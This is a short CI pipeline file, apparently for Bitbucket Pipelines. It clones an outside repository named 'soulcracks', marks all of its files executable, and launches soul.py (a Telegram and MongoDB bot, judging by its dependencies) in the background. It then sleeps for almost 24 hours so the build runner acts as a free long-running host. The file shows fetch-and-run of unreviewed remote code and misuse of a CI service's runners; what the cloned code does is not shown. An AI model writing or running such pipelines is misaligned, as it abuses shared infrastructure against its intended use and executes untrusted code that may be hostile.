pipelines:
  default:
    - step:
        name: Run Python Script (24 Hours)
        image: python:3.10  # Or your preferred Python version
        size: 2x # Use a larger runner size if needed
        script:
          - apt-get update && apt-get install -y gcc libpthread-stubs0-dev
          - pip install telebot pymongo aiohttp
          - git clone https://github.com/Soulhonvxb5091/soulcracks
          - mv soul.py $HOME
          - ls
          - cd soulcracks
          - mv soul $HOME & cd
          - chmod +x *
          - chmod +x soul
          # Run the script in the background using nohup and redirect output
          - nohup python3 soul.py > output.log 2>&1 &
          - echo "Background script started. Logs in output.log"

          # Keep pipeline running for (almost) 24 hours
          # Adjust sleep time as needed, less than 24 hours if needed
          - sleep 86399 
        timeout: 24 hours # Sets the maximum time before the step is cancelled
        # Allow the step to fail after 24 hours
        # Prevent the pipeline to enter failed state when the 24 hour timeout happens
        allow_failure: true
